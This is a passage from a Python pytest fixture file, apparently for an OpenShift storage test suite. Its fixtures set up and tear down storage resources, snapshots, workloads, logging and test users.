Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request,
bucket_factory_session,
project_factory_session,
mcg_obj_session,
tmp_path,
)
@pytest.fixture()
def backingstore_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If MCG object not found
"""
if mcg_obj:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
else:
return None
@pytest.fixture(scope="session")
def backingstore_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
else:
return None
@pytest.fixture()
def bucket_class_factory(
request, mcg_obj, backingstore_factory, namespace_store_factory
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If MCG object not found
"""
if mcg_obj:
return bucketclass_factory_implementation(
request, mcg_obj, backingstore_factory, namespace_store_factory
)
else:
return None
@pytest.fixture(scope="session")
def bucket_class_factory_session(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return bucketclass_factory_implementation(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
)
else:
return None
@pytest.fixture()
def multiregion_mirror_setup(bucket_factory):
return multiregion_mirror_setup_fixture(bucket_factory)
@pytest.fixture(scope="session")
def multiregion_mirror_setup_session(bucket_factory_session):
return multiregion_mirror_setup_fixture(bucket_factory_session)
def multiregion_mirror_setup_fixture(bucket_factory):
# Setup
# Todo:
# add region and amount parametrization - note that `us-east-1`
# will cause an error as it is the default region. If usage of `us-east-1`
# needs to be tested, keep the 'region' field out.
bucketclass = {
"interface": "CLI",
"backingstore_dict": {"aws": [(1, "us-west-1"), (1, "us-east-2")]},
"placement_policy": "Mirror",
}
# Create a NooBucket that'll use the bucket class in order to test
# the mirroring policy
bucket = bucket_factory(1, "OC", bucketclass=bucketclass)[0]
return bucket, bucket.bucketclass.backingstores
@pytest.fixture(scope="session")
def default_storageclasses(request, teardown_factory_session):
"""
Returns dictionary with storageclasses. Keys represent reclaim policy of
storageclass. There are two storageclasses for each key. First is RBD based
and the second one is CephFS based. Storageclasses with Retain Reclaim
Policy are created from default storageclasses.
"""
scs = {constants.RECLAIM_POLICY_DELETE: [], constants.RECLAIM_POLICY_RETAIN: []}
# TODO(fbalak): Use proper constants after
# https://github.com/red-hat-storage/ocs-ci/issues/1056
# is resolved
for sc_name in ("ocs-storagecluster-ceph-rbd", "ocs-storagecluster-cephfs"):
sc = OCS(kind=constants.STORAGECLASS, metadata={"name": sc_name})
sc.reload()
scs[constants.RECLAIM_POLICY_DELETE].append(sc)
sc.data["reclaimPolicy"] = constants.RECLAIM_POLICY_RETAIN
sc.data["metadata"]["name"] += "-retain"
sc._name = sc.data["metadata"]["name"]
sc.create()
teardown_factory_session(sc)
scs[constants.RECLAIM_POLICY_RETAIN].append(sc)
return scs
@pytest.fixture(scope="class")
def install_logging(request):
"""
Setup and teardown
* The setup will deploy openshift-logging in the cluster
* The teardown will uninstall cluster-logging from the cluster
"""
def finalizer():
uninstall_cluster_logging()
request.addfinalizer(finalizer)
csv = ocp.OCP(
kind=constants.CLUSTER_SERVICE_VERSION,
namespace=constants.OPENSHIFT_LOGGING_NAMESPACE,
)
logging_csv = csv.get().get("items")
if logging_csv:
log.info("Logging is already configured, Skipping Installation")
return
log.info("Configuring Openshift-logging")
# Checks OCP version
ocp_version = get_running_ocp_version()
logging_channel = "stable" if ocp_version >= "4.7" else ocp_version
# Creates namespace openshift-operators-redhat
ocp_logging_obj.create_namespace(yaml_file=constants.EO_NAMESPACE_YAML)
# Creates an operator-group for elasticsearch
assert ocp_logging_obj.create_elasticsearch_operator_group(
yaml_file=constants.EO_OG_YAML, resource_name="openshift-operators-redhat"
)
# Set RBAC policy on the project
assert ocp_logging_obj.set_rbac(
yaml_file=constants.EO_RBAC_YAML, resource_name="prometheus-k8s"
)
# Creates subscription for elastic-search operator
subscription_yaml = templating.load_yaml(constants.EO_SUB_YAML)
subscription_yaml["spec"]["channel"] = logging_channel
helpers.create_resource(**subscription_yaml)
assert ocp_logging_obj.get_elasticsearch_subscription()
# Creates a namespace openshift-logging
ocp_logging_obj.create_namespace(yaml_file=constants.CL_NAMESPACE_YAML)
# Creates an operator-group for cluster-logging
assert ocp_logging_obj.create_clusterlogging_operator_group(
yaml_file=constants.CL_OG_YAML
)
# Creates subscription for cluster-logging
cl_subscription = templating.load_yaml(constants.CL_SUB_YAML)
cl_subscription["spec"]["channel"] = logging_channel
helpers.create_resource(**cl_subscription)
assert ocp_logging_obj.get_clusterlogging_subscription()
# Creates instance in namespace openshift-logging
cluster_logging_operator = OCP(
kind=constants.POD, namespace=constants.OPENSHIFT_LOGGING_NAMESPACE
)
log.info(f"The cluster-logging-operator {cluster_logging_operator.get()}")
ocp_logging_obj.create_instance()
@pytest.fixture
def fio_pvc_dict():
"""
PVC template for fio workloads.
Note that all 'None' values needs to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture(scope="session")
def fio_pvc_dict_session():
"""
PVC template for fio workloads.
Note that all 'None' values needs to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture
def fio_configmap_dict():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture(scope="session")
def fio_configmap_dict_session():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture
def fio_job_dict():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="session")
def fio_job_dict_session():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="function")
def pgsql_factory_fixture(request):
"""
Pgsql factory fixture
"""
pgsql = Postgresql()
def factory(
replicas,
clients=None,
threads=None,
transactions=None,
scaling_factor=None,
timeout=None,
sc_name=None,
):
"""
Factory to start pgsql workload
Args:
replicas (int): Number of pgbench pods to be deployed
clients (int): Number of clients
threads (int): Number of threads
transactions (int): Number of transactions
scaling_factor (int): scaling factor
timeout (int): Time in seconds to wait
"""
# Setup postgres
pgsql.setup_postgresql(replicas=replicas, sc_name=sc_name)
# Create pgbench benchmark
pgsql.create_pgbench_benchmark(
replicas=replicas,
clients=clients,
threads=threads,
transactions=transactions,
scaling_factor=scaling_factor,
timeout=timeout,
)
# Wait for pg_bench pod to initialized and complete
pgsql.wait_for_pgbench_status(status=constants.STATUS_COMPLETED)
# Get pgbench pods
pgbench_pods = pgsql.get_pgbench_pods()
# Validate pgbench run and parse logs
pgsql.validate_pgbench_run(pgbench_pods)
return pgsql
def finalizer():
"""
Clean up
"""
pgsql.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def jenkins_factory_fixture(request):
"""
Jenkins factory fixture
"""
jenkins = Jenkins()
def factory(num_projects=1, num_of_builds=1):
"""
Factory to start jenkins workload
Args:
num_projects (int): Number of Jenkins projects
num_of_builds (int): Number of builds per project
"""
# Jenkins template
jenkins.create_ocs_jenkins_template()
# Init number of projects
jenkins.number_projects = num_projects
# Create app jenkins
jenkins.create_app_jenkins()
# Create jenkins pvc
jenkins.create_jenkins_pvc()
# Create jenkins build config
jenkins.create_jenkins_build_config()
# Wait jenkins deploy pod reach to completed state
jenkins.wait_for_jenkins_deploy_status(status=constants.STATUS_COMPLETED)
# Init number of builds per project
jenkins.number_builds_per_project = num_of_builds
# Start Builds
jenkins.start_build()
# Wait build reach 'Complete' state
jenkins.wait_for_build_to_complete()
# Print table of builds
jenkins.print_completed_builds_results()
return jenkins
def finalizer():
"""
Clean up
"""
jenkins.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def couchbase_factory_fixture(request):
"""
Couchbase factory fixture
"""
couchbase = CouchBase()
def factory(
replicas=3,
run_in_bg=False,
skip_analyze=True,
sc_name=None,
num_items=None,
num_threads=None,
):
"""
Factory to start couchbase workload
Args:
replicas (int): Number of couchbase workers to be deployed
run_in_bg (bool): Run IOs in background as option
skip_analyze (bool): Skip logs analysis as option
"""
# Setup couchbase
couchbase.setup_cb()
# Create couchbase workers
couchbase.create_couchbase_worker(replicas=replicas, sc_name=sc_name)
# Run couchbase workload
couchbase.run_workload(
replicas=replicas,
run_in_bg=run_in_bg,
num_items=num_items,
num_threads=num_threads,
)
# Run sanity check on data logs
couchbase.analyze_run(skip_analyze=skip_analyze)
return couchbase
def finalizer():
"""
Clean up
"""
couchbase.teardown()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def amq_factory_fixture(request):
"""
AMQ factory fixture
"""
amq = AMQ()
def factory(
sc_name,
kafka_namespace=constants.AMQ_NAMESPACE,
size=100,
replicas=3,
topic_name="my-topic",
user_name="my-user",
partitions=1,
topic_replicas=1,
num_of_producer_pods=1,
num_of_consumer_pods=1,
value="10000",
since_time=1800,
):
"""
Factory to start amq workload
Args:
sc_name (str): Name of storage clase
kafka_namespace (str): Namespace where kafka cluster to be created
size (int): Size of the storage
replicas (int): Number of kafka and zookeeper pods to be created
topic_name (str): Name of the topic to be created
user_name (str): Name of the user to be created
partitions (int): Number of partitions of topic
topic_replicas (int): Number of replicas of topic
num_of_producer_pods (int): Number of producer pods to be created
num_of_consumer_pods (int): Number of consumer pods to be created
value (str): Number of messages to be sent and received
since_time (int): Number of seconds to required to sent the msg
"""
# Setup kafka cluster
amq.setup_amq_cluster(
sc_name=sc_name, namespace=kafka_namespace, size=size, replicas=replicas
)
# Run open messages
amq.create_messaging_on_amq(
topic_name=topic_name,
user_name=user_name,
partitions=partitions,
replicas=topic_replicas,
num_of_producer_pods=num_of_producer_pods,
num_of_consumer_pods=num_of_consumer_pods,
value=value,
)
# Wait for some time to generate msg
waiting_time = 60
log.info(f"Waiting for {waiting_time}sec to generate msg")
time.sleep(waiting_time)
# Check messages are sent and received
threads = amq.run_in_bg(
namespace=kafka_namespace, value=value, since_time=since_time
)
return amq, threads
def finalizer():
"""
Clean up
"""
# Clean up
amq.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture
def measurement_dir(tmp_path):
"""
Returns directory path where should be stored all results related
to measurement. If 'measurement_dir' is provided by config then use it,
otherwise new directory is generated.
Returns:
str: Path to measurement directory
"""
if config.ENV_DATA.get("measurement_dir"):
measurement_dir = config.ENV_DATA.get("measurement_dir")
log.info(f"Using measurement dir from configuration: {measurement_dir}")
else:
measurement_dir = os.path.join(os.path.dirname(tmp_path), "measurement_results")
if not os.path.exists(measurement_dir):
log.info(f"Measurement dir {measurement_dir} doesn't exist. Creating it.")
os.mkdir(measurement_dir)
return measurement_dir
@pytest.fixture()
def multi_dc_pod(multi_pvc_factory, dc_pod_factory, service_account_factory):
"""
Prepare multiple dc pods for the test
Returns:
list: Pod instances
"""
def factory(
num_of_pvcs=1,
pvc_size=100,
project=None,
access_mode="RWO",
pool_type="rbd",
timeout=60,
):
dict_modes = {
"RWO": "ReadWriteOnce",
"RWX": "ReadWriteMany",
"RWX-BLK": "ReadWriteMany-Block",
}
dict_types = {"rbd": "CephBlockPool", "cephfs": "CephFileSystem"}
if access_mode in "RWX-BLK" and pool_type in "rbd":
modes = dict_modes["RWX-BLK"]
create_rbd_block_rwx_pod = True
else:
modes = dict_modes[access_mode]
create_rbd_block_rwx_pod = False
pvc_objs = multi_pvc_factory(
interface=dict_types[pool_type],
access_modes=[modes],
size=pvc_size,
num_of_pvc=num_of_pvcs,
project=project,
timeout=timeout,
)
dc_pods = []
dc_pods_res = []
sa_obj = service_account_factory(project=project)
with ThreadPoolExecutor() as p:
for pvc_obj in pvc_objs:
if create_rbd_block_rwx_pod:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=constants.CEPHBLOCKPOOL,
pvc=pvc_obj,
raw_block_pv=True,
sa_obj=sa_obj,
)
)
else:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=dict_types[pool_type],
pvc=pvc_obj,
sa_obj=sa_obj,
)
)
for dc in dc_pods_res:
pod_obj = dc.result()
if create_rbd_block_rwx_pod:
log.info(
"#### setting attribute pod_type since "
f"create_rbd_block_rwx_pod = {create_rbd_block_rwx_pod}"
)
setattr(pod_obj, "pod_type", "rbd_block_rwx")
else:
setattr(pod_obj, "pod_type", "")
dc_pods.append(pod_obj)
with ThreadPoolExecutor() as p:
for dc in dc_pods:
p.submit(
helpers.wait_for_resource_state,
resource=dc,
state=constants.STATUS_RUNNING,
timeout=120,
)
return dc_pods
return factory
@pytest.fixture(scope="session")
def htpasswd_path(tmpdir_factory):
"""
Returns:
string: Path to HTPasswd file with additional usernames
"""
return str(tmpdir_factory.mktemp("idp_data").join("users.htpasswd"))
@pytest.fixture(scope="session")
def htpasswd_identity_provider(request):
"""
Creates HTPasswd Identity provider.
Returns:
object: OCS object representing OCP OAuth object with HTPasswd IdP
"""
users.create_htpasswd_idp()
cluster = OCS(kind=constants.OAUTH, metadata={"name": "cluster"})
cluster.reload()
def finalizer():
"""
Remove HTPasswd IdP
"""
# TODO(fbalak): remove HTPasswd identityProvider
# cluster.ocp.patch(
# resource_name='cluster',
# params=f'[{ "op": "remove", "path": "/spec/identityProviders" }]'
# )
# users.delete_htpasswd_secret()
request.addfinalizer(finalizer)
return cluster
@pytest.fixture(scope="function")
def user_factory(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(scope="session")
def user_factory_session(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(autouse=True)
def log_alerts(request):
"""
Log alerts at the beginning and end of each test case. At the end of test
case print a difference: what new alerts are in place after the test is
complete.
"""
teardown = config.RUN["cli_params"].get("teardown")
dev_mode = config.RUN["cli_params"].get("dev_mode")
if teardown:
return
elif dev_mode:
log.info("Skipping alert check for development mode")
return
alerts_before = []
prometheus = None
try:
prometheus = PrometheusAPI()
except Exception:
log.exception("There was a problem with connecting to Prometheus")
def _collect_alerts():
try:
alerts_response = prometheus.get(
"alerts", payload={"silenced": False, "inhibited": False}
)
if alerts_response.ok:
alerts = alerts_response.json().get("data").get("alerts")
log.debug(f"Found alerts: {alerts}")
return alerts
else:
log.warning(
f"There was a problem with collecting alerts for analysis: {alerts_response.text}"
)
return False
except Exception:
log.exception("There was a problem with collecting alerts for analysis")
return False
def _print_diff():
if alerts_before:
alerts_after = _collect_alerts()
if alerts_after:
alerts_new = [
alert for alert in alerts_after if alert not in alerts_before
]
if alerts_new:
log.warning("During test were raised new alerts")
log.warning(alerts_new)
alerts_before = _collect_alerts()
request.addfinalizer(_print_diff)
@pytest.fixture(scope="session", autouse=True)
def ceph_toolbox(request):
"""
This fixture initiates ceph toolbox pod for manually created deployment
and if it does not already exist.
"""
deploy = config.RUN["cli_params"]["deploy"]
teardown = config.RUN["cli_params"].get("teardown")
skip_ocs = config.ENV_DATA["skip_ocs_deployment"]
deploy_teardown = deploy or teardown
ocp_dedicated = (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
)
if not (deploy_teardown or skip_ocs) or (ocp_dedicated and not deploy_teardown):
try:
# Creating toolbox pod
setup_ceph_toolbox()
except CommandFailed:
log.info("Failed to create toolbox")
@pytest.fixture(scope="function")
def node_drain_teardown(request):
"""
Tear down function after Node drain
"""
def finalizer():
"""
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by marking them as schedulable
"""
scheduling_disabled_nodes = [
n.name
for n in get_node_objs()
if n.ocp.get_resource_status(n.name)
== constants.NODE_READY_SCHEDULING_DISABLED
]
if scheduling_disabled_nodes:
schedule_nodes(scheduling_disabled_nodes)
ceph_health_check(tries=60)
request.addfinalizer(finalizer)
@pytest.fixture(scope="function")
def node_restart_teardown(request, nodes):
"""
Make sure all nodes are up and in 'Ready' state and if not,
try to make them 'Ready' by restarting the nodes.
"""
def finalizer():
# Start the powered off nodes
nodes.restart_nodes_by_stop_and_start_teardown()
try:
node.wait_for_nodes_status(status=constants.NODE_READY)
except ResourceWrongStatusException:
# Restart the nodes if in NotReady state
not_ready_nodes = [
n
for n in node.get_node_objs()
if n.ocp.get_resource_status(n.name) == constants.NODE_NOT_READY
]
if not_ready_nodes:
log.info(
f"Nodes in NotReady status found: {[n.name for n in not_ready_nodes]}"
)
nodes.restart_nodes_by_stop_and_start(not_ready_nodes)
node.wait_for_nodes_status(status=constants.NODE_READY)
request.addfinalizer(finalizer)
@pytest.fixture()
def mcg_connection_factory(request, mcg_obj, cld_mgr):
"""
Create a new MCG connection for given platform. If there already exists
a connection for the platform then return this previously created
connection.
"""
created_connections = {}
def _create_connection(platform=constants.AWS_PLATFORM, name=None):
"""
Args:
platform (str): Platform used for connection
name (str): New connection name. If not provided then new name will
be generated. New name will be used only if there is not
existing connection for given platform
Returns:
str: connection name
"""
if platform not in created_connections:
connection_name = name or create_unique_resource_name(
constants.MCG_CONNECTION, platform
)
mcg_obj.create_connection(cld_mgr, platform, connection_name)
created_connections[platform] = connection_name
return created_connections[platform]
def _connections_cleanup():
for platform in created_connections:
mcg_obj.delete_ns_connection(created_connections[platform])
request.addfinalizer(_connections_cleanup)
return _create_connection
@pytest.fixture()
def ns_resource_factory(
request, mcg_obj, cld_mgr, cloud_uls_factory, mcg_connection_factory
):
"""
Create a namespace resource factory. Calling this fixture creates a new namespace resource.
"""
created_ns_resources = []
def _create_ns_resources(platform=constants.AWS_PLATFORM):
# Create random connection_name
rand_connection = mcg_connection_factory(platform)
# Create the actual namespace resource
rand_ns_resource = create_unique_resource_name(
constants.MCG_NS_RESOURCE, platform
)
if platform == constants.RGW_PLATFORM:
region = None
else:
# TODO: fix this when https://github.com/red-hat-storage/ocs-ci/issues/3338
# is resolved
region = "us-east-2"
target_bucket_name = mcg_obj.create_namespace_resource(
rand_ns_resource,
rand_connection,
region,
cld_mgr,
cloud_uls_factory,
platform,
)
log.info(f"Check validity of NS resource {rand_ns_resource}")
if platform == constants.AWS_PLATFORM:
endpoint = constants.MCG_NS_AWS_ENDPOINT
elif platform == constants.AZURE_PLATFORM:
endpoint = constants.MCG_NS_AZURE_ENDPOINT
elif platform == constants.RGW_PLATFORM:
rgw_conn = RGW()
endpoint, _, _ = rgw_conn.get_credentials()
else:
raise UnsupportedPlatformError(f"Unsupported Platform: {platform}")
mcg_obj.check_ns_resource_validity(
rand_ns_resource, target_bucket_name, endpoint
)
created_ns_resources.append(rand_ns_resource)
return target_bucket_name, rand_ns_resource
def ns_resources_cleanup():
for ns_resource in created_ns_resources:
mcg_obj.delete_ns_resource(ns_resource)
request.addfinalizer(ns_resources_cleanup)
return _create_ns_resources
@pytest.fixture()
def namespace_store_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
@pytest.fixture(scope="session")
def namespace_store_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
@pytest.fixture()
def snapshot_factory(request):
"""
Snapshot factory. Calling this fixture creates a volume snapshot from the
specified PVC
"""
instances = []
def factory(pvc_obj, wait=True, snapshot_name=None):
"""
Args:
pvc_obj (PVC): PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name (str): Name to be provided for snapshot
Returns:
OCS: OCS instance of kind VolumeSnapshot
"""
snap_obj = pvc_obj.create_snapshot(snapshot_name=snapshot_name, wait=wait)
instances.append(snap_obj)
return snap_obj
def finalizer():
"""
Delete the snapshots
"""
snapcontent_objs = []
# Get VolumeSnapshotContent form VolumeSnapshots and delete
# VolumeSnapshots
for instance in instances:
if not instance.is_deleted:
snapcontent_objs.append(
helpers.get_snapshot_content_obj(snap_obj=instance)
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for VolumeSnapshotContents to be deleted
for snapcontent_obj in snapcontent_objs:
snapcontent_obj.ocp.wait_for_delete(
resource_name=snapcontent_obj.name, timeout=240
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_factory(snapshot_factory):
"""
Snapshot factory. Calling this fixture creates volume snapshots of each
PVC in the provided list
"""
def factory(pvc_obj, wait=True, snapshot_name_suffix=None):
"""
Args:
pvc_obj (list): List PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name_suffix (str): Suffix to be added to snapshot
Returns:
OCS: List of OCS instances of kind VolumeSnapshot
"""
snapshot = []
for obj in pvc_obj:
log.info(f"Creating snapshot of PVC {obj.name}")
snapshot_name = (
f"{obj.name}-{snapshot_name_suffix}" if snapshot_name_suffix else None
)
snap_obj = snapshot_factory(
pvc_obj=obj, snapshot_name=snapshot_name, wait=wait
)
snapshot.append(snap_obj)
return snapshot
return factory
@pytest.fixture()
def snapshot_restore_factory(request):
"""
Snapshot restore factory. Calling this fixture creates new PVC out of the
specified VolumeSnapshot.
"""
instances = []
def factory(
snapshot_obj,
restore_pvc_name=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
):
"""
Args:
snapshot_obj (OCS): OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_name (str): Name to be provided for restored pvc
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
Returns:
PVC: Restored PVC object
"""
snapshot_info = snapshot_obj.get()
size = size or snapshot_info["status"]["restoreSize"]
restore_pvc_name = restore_pvc_name or (
helpers.create_unique_resource_name(snapshot_obj.name, "restore")
)
if snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHBLOCKPOOL).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHBLOCKPOOL).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_RBD_PVC_RESTORE_YAML
interface = constants.CEPHBLOCKPOOL
elif snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHFILESYSTEM).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHFILESYSTEM).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_CEPHFS_PVC_RESTORE_YAML
interface = constants.CEPHFILESYSTEM
restored_pvc = create_restore_pvc(
sc_name=storageclass,
snap_name=snapshot_obj.name,
namespace=snapshot_obj.namespace,
size=size,
pvc_name=restore_pvc_name,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
)
instances.append(restored_pvc)
restored_pvc.snapshot = snapshot_obj
restored_pvc.interface = interface
if status:
helpers.wait_for_resource_state(restored_pvc, status)
return restored_pvc
def finalizer():
"""
Delete the PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_restore_factory(snapshot_restore_factory):
"""
Snapshot restore factory. Calling this fixture creates set of new PVC out of the
each VolumeSnapshot provided in the list.
"""
def factory(
snapshot_obj,
restore_pvc_suffix=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
wait_each=False,
):
"""
Args:
snapshot_obj (list): List OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_suffix (str): Suffix to be added to pvc name
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List of restored PVC object
"""
new_pvcs = []
status_tmp = status if wait_each else ""
for snap_obj in snapshot_obj:
log.info(f"Creating a PVC from snapshot {snap_obj.name}")
restore_pvc_name = (
f"{snap_obj.name}-{restore_pvc_suffix}" if restore_pvc_suffix else None
)
restored_pvc = snapshot_restore_factory(
snapshot_obj=snap_obj,
restore_pvc_name=restore_pvc_name,
storageclass=storageclass,
size=size,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
status=status_tmp,
)
restored_pvc.snapshot = snapshot_obj
new_pvcs.append(restored_pvc)
if status and not wait_each:
for restored_pvc in new_pvcs:
helpers.wait_for_resource_state(restored_pvc, status)
return new_pvcs
return factory
@pytest.fixture(scope="session", autouse=True)
def collect_logs_fixture(request):
"""
This fixture collects ocs logs after tier execution and this will allow
to see the cluster's status after the execution on all execution status options.
"""
def finalizer():
"""
Tracking both logs separately reduce changes of collision
"""
if not config.RUN["cli_params"].get("deploy") and not config.RUN[
"cli_params"
].get("teardown"):
if config.REPORTING["collect_logs_on_success_run"]:
collect_ocs_logs("testcases", ocs=False, status_failure=False)
collect_ocs_logs("testcases", ocp=False, status_failure=False)
request.addfinalizer(finalizer)
def get_ready_noobaa_endpoint_count(namespace):
"""
Get the number of ready nooobaa endpoints
"""
pods_info = get_pods_having_label(
label=constants.NOOBAA_ENDPOINT_POD_LABEL, namespace=namespace
)
ready_count = 0
for ep_info in pods_info:
container_statuses = ep_info.get("status", {}).get("containerStatuses")
if container_statuses is not None and len(container_statuses) > 0:
if container_statuses[0].get("ready"):
ready_count += 1
return ready_count
@pytest.fixture(scope="function")
def nb_ensure_endpoint_count(request):
"""
Validate and ensure the number of running noobaa endpoints
"""
cls = request.cls
min_ep_count = cls.MIN_ENDPOINT_COUNT
max_ep_count = cls.MAX_ENDPOINT_COUNT
assert min_ep_count <= max_ep_count
namespace = defaults.ROOK_CLUSTER_NAMESPACE
should_wait = False
# prior to 4.6 we configured the ep count directly on the noobaa cr.
if float(config.ENV_DATA["ocs_version"]) < 4.6:
noobaa = OCP(kind="noobaa", namespace=namespace)
resource = noobaa.get()["items"][0]
endpoints = resource.get("spec", {}).get("endpoints", {})
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
else:
storage_cluster = OCP(kind=constants.STORAGECLUSTER, namespace=namespace)
resource = storage_cluster.get()["items"][0]
resource_name = resource["metadata"]["name"]
endpoints = (
resource.get("spec", {}).get("multiCloudGateway", {}).get("endpoints", {})
)
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if should_wait:
# Wait for the NooBaa endpoint pods to stabilize
try:
for ready_nb_ep_count in TimeoutSampler(
300, 30, get_ready_noobaa_endpoint_count, namespace
):
if min_ep_count <= ready_nb_ep_count <= max_ep_count:
log.info(
f"NooBaa endpoints stabilized. Ready endpoints: {ready_nb_ep_count}"
)
break
log.info(
f"Waiting for the NooBaa endpoints to stabilize. "
f"Current ready count: {ready_nb_ep_count}"
)
except TimeoutExpiredError:
raise TimeoutExpiredError(
"NooBaa endpoints did not stabilize in time.\n"
f"Min count: {min_ep_count}, max count: {max_ep_count}, ready count: {ready_nb_ep_count}"
)
@pytest.fixture()
def pvc_clone_factory(request):
"""
Calling this fixture creates a clone from the specified PVC
"""
instances = []
def factory(
pvc_obj,
